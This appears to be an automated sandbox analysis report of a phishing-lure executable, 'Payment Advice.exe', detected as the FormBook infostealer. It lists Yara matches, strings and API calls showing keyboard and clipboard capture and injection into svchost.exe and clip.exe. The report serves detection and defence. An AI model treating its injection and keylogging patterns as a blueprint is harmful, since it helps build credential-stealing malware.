Source: clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
Source: clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
Source: clip.exe, 00000003.00000002.4100415517.000000000552C000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000031FC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.networksolutions.com/

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_005D6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_005D6B0C

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_005D6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_005D6D07

Source: C:\Users\user\Desktop\Payment Advice.exe

0_2_005D6B0C

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_005C2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_005C2B37

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_005EF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_005EF7FF

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4099874690.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4098771264.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1824764335.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1824537805.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4099046752.0000000002830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1825289578.0000000005550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4099815703.0000000004C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4099874690.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4098771264.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1824764335.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1824537805.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4099046752.0000000002830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1825289578.0000000005550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.4099815703.0000000004C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00583D19
Source: Payment Advice.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Payment Advice.exe, 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_e0306620-b
Source: Payment Advice.exe, 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: [SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_ebb06060-a
Source: Payment Advice.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_406e0299-1
Source: Payment Advice.exe	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_42ed39f7-3

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Payment Advice.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042AFF3 NtClose,	1_2_0042AFF3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472B60 NtClose,LdrInitializeThunk,	1_2_03472B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,	1_2_03472DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472C70 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_03472C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034735C0 NtCreateMutant,LdrInitializeThunk,	1_2_034735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03474340 NtSetContextThread,	1_2_03474340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03474650 NtSuspendThread,	1_2_03474650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472BE0 NtQueryValueKey,	1_2_03472BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472BF0 NtAllocateVirtualMemory,	1_2_03472BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472B80 NtQueryInformationFile,	1_2_03472B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472BA0 NtEnumerateValueKey,	1_2_03472BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472AD0 NtReadFile,	1_2_03472AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472AF0 NtWriteFile,	1_2_03472AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472AB0 NtWaitForSingleObject,	1_2_03472AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472F60 NtCreateProcessEx,	1_2_03472F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472F30 NtCreateSection,	1_2_03472F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472FE0 NtCreateFile,	1_2_03472FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472F90 NtProtectVirtualMemory,	1_2_03472F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472FA0 NtQuerySection,	1_2_03472FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472FB0 NtResumeThread,	1_2_03472FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472E30 NtWriteVirtualMemory,	1_2_03472E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472EE0 NtQueueApcThread,	1_2_03472EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472E80 NtReadVirtualMemory,	1_2_03472E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472EA0 NtAdjustPrivilegesToken,	1_2_03472EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472D00 NtSetInformationFile,	1_2_03472D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472D10 NtMapViewOfSection,	1_2_03472D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472D30 NtUnmapViewOfSection,	1_2_03472D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472DD0 NtDelayExecution,	1_2_03472DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472DB0 NtEnumerateKey,	1_2_03472DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472C60 NtCreateKey,	1_2_03472C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472C00 NtQueryInformationProcess,	1_2_03472C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472CC0 NtQueryVirtualMemory,	1_2_03472CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472CF0 NtOpenProcess,	1_2_03472CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03472CA0 NtQueryInformationToken,	1_2_03472CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03473010 NtOpenDirectoryObject,	1_2_03473010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03473090 NtSetValueKey,	1_2_03473090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034739B0 NtGetContextThread,	1_2_034739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03473D70 NtOpenThread,	1_2_03473D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03473D10 NtOpenProcessToken,	1_2_03473D10
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04544650 NtSuspendThread,LdrInitializeThunk,	3_2_04544650
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04544340 NtSetContextThread,LdrInitializeThunk,	3_2_04544340
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04542C70 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_04542C70
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04542C60 NtCreateKey,LdrInitializeThunk,	3_2_04542C60
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04542CA0 NtQueryInformationToken,LdrInitializeThunk,	3_2_04542CA0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04542D10 NtMapViewOfSection,LdrInitializeThunk,	3_2_04542D10
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04542D30 NtUnmapViewOfSection,LdrInitializeThunk,	3_2_04542D30
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04542DD0 NtDelayExecution,LdrInitializeThunk,	3_2_04542DD0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04542DF0 NtQuerySystemInformation,LdrInitializeThunk,	3_2_04542DF0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04542EE0 NtQueueApcThread,LdrInitializeThunk,	3_2_04542EE0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04542E80 NtReadVirtualMemory,LdrInitializeThunk,	3_2_04542E80
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04542F30 NtCreateSection,LdrInitializeThunk,	3_2_04542F30
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04542FE0 NtCreateFile,LdrInitializeThunk,	3_2_04542FE0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04542FB0 NtResumeThread,LdrInitializeThunk,	3_2_04542FB0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04542AD0 NtReadFile,LdrInitializeThunk,	3_2_04542AD0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04542AF0 NtWriteFile,LdrInitializeThunk,	3_2_04542AF0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04542B60 NtClose,LdrInitializeThunk,	3_2_04542B60
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04542BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	3_2_04542BF0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04542BE0 NtQueryValueKey,LdrInitializeThunk,	3_2_04542BE0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04542BA0 NtEnumerateValueKey,LdrInitializeThunk,	3_2_04542BA0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045435C0 NtCreateMutant,LdrInitializeThunk,	3_2_045435C0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045439B0 NtGetContextThread,LdrInitializeThunk,	3_2_045439B0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04542C00 NtQueryInformationProcess,	3_2_04542C00
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04542CC0 NtQueryVirtualMemory,	3_2_04542CC0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04542CF0 NtOpenProcess,	3_2_04542CF0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04542D00 NtSetInformationFile,	3_2_04542D00
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04542DB0 NtEnumerateKey,	3_2_04542DB0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04542E30 NtWriteVirtualMemory,	3_2_04542E30
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04542EA0 NtAdjustPrivilegesToken,	3_2_04542EA0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04542F60 NtCreateProcessEx,	3_2_04542F60
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04542F90 NtProtectVirtualMemory,	3_2_04542F90
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04542FA0 NtQuerySection,	3_2_04542FA0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04542AB0 NtWaitForSingleObject,	3_2_04542AB0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04542B80 NtQueryInformationFile,	3_2_04542B80
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04543010 NtOpenDirectoryObject,	3_2_04543010
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04543090 NtSetValueKey,	3_2_04543090
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04543D70 NtOpenThread,	3_2_04543D70
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04543D10 NtOpenProcessToken,	3_2_04543D10
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_023A7B40 NtCreateFile,	3_2_023A7B40
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_023A7E30 NtClose,	3_2_023A7E30
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_023A7F90 NtAllocateVirtualMemory,	3_2_023A7F90
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_023A7CA0 NtReadFile,	3_2_023A7CA0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_023A7D90 NtDeleteFile,	3_2_023A7D90

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_005C6606: CreateFileW,DeviceIoControl,CloseHandle,

0_2_005C6606

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_005BACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_005BACC5

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_005C79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_005C79D3

Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005AB043	0_2_005AB043
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_00593200	0_2_00593200
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_00593B70	0_2_00593B70
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005B410F	0_2_005B410F
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005A02A4	0_2_005A02A4
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_0058E3E3	0_2_0058E3E3
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005B038E	0_2_005B038E
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005B467F	0_2_005B467F
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005A06D9	0_2_005A06D9
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005EAACE	0_2_005EAACE
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005B4BEF	0_2_005B4BEF
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005ACCC1	0_2_005ACCC1
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_0058AF50	0_2_0058AF50
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_00586F07	0_2_00586F07
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_0059B11F	0_2_0059B11F
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005E31BC	0_2_005E31BC
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005AD1B9	0_2_005AD1B9
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005B724D	0_2_005B724D
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005A123A	0_2_005A123A
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005C13CA	0_2_005C13CA
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005893F0	0_2_005893F0
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_0059F563	0_2_0059F563
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005CB6CC	0_2_005CB6CC
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005896C0	0_2_005896C0
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005EF7FF	0_2_005EF7FF
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005877B0	0_2_005877B0
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005B79C9	0_2_005B79C9
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_0059FA57	0_2_0059FA57
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_00589B60	0_2_00589B60
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_00587D19	0_2_00587D19
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_0059FE6F	0_2_0059FE6F
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005A9ED0	0_2_005A9ED0
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_00587FA3	0_2_00587FA3
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_017535E0	0_2_017535E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004011C0	1_2_004011C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004021A5	1_2_004021A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004021B0	1_2_004021B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040FACB	1_2_0040FACB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040FAD3	1_2_0040FAD3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402320	1_2_00402320
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004023BC	1_2_004023BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042D443	1_2_0042D443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00416433	1_2_00416433
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040FCF3	1_2_0040FCF3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040DD73	1_2_0040DD73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402F50	1_2_00402F50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034FA352	1_2_034FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0344E3F0	1_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_035003E6	1_2_035003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034E0274	1_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034C02C0	1_2_034C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034C8158	1_2_034C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03430100	1_2_03430100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034DA118	1_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034F81CC	1_2_034F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034F41A2	1_2_034F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_035001AA	1_2_035001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034D2000	1_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03464750	1_2_03464750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03440770	1_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343C7C0	1_2_0343C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345C6E0	1_2_0345C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03440535	1_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03500591	1_2_03500591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034F2446	1_2_034F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034E4420	1_2_034E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034EE4F6	1_2_034EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034FAB40	1_2_034FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034F6BD7	1_2_034F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343EA80	1_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03456962	1_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034429A0	1_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0350A9A6	1_2_0350A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0344A840	1_2_0344A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03442840	1_2_03442840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0346E8F0	1_2_0346E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034268B8	1_2_034268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B4F40	1_2_034B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03482F28	1_2_03482F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03460F30	1_2_03460F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03432FC8	1_2_03432FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034BEFA0	1_2_034BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03440E59	1_2_03440E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034FEE26	1_2_034FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034FEEDB	1_2_034FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03452E90	1_2_03452E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034FCE93	1_2_034FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0344AD00	1_2_0344AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034DCD1F	1_2_034DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0343ADE0	1_2_0343ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03458DBF	1_2_03458DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03440C00	1_2_03440C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03430CF2	1_2_03430CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034E0CB5	1_2_034E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0342D34C	1_2_0342D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034F132D	1_2_034F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0348739A	1_2_0348739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345B2C0	1_2_0345B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034E12ED	1_2_034E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345D2F0	1_2_0345D2F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034452A0	1_2_034452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0347516C	1_2_0347516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0342F172	1_2_0342F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0350B16B	1_2_0350B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0344B1B0	1_2_0344B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034EF0CC	1_2_034EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034470C0	1_2_034470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034F70E9	1_2_034F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034FF0E0	1_2_034FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034FF7B0	1_2_034FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03485630	1_2_03485630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034F16CC	1_2_034F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034F7571	1_2_034F7571
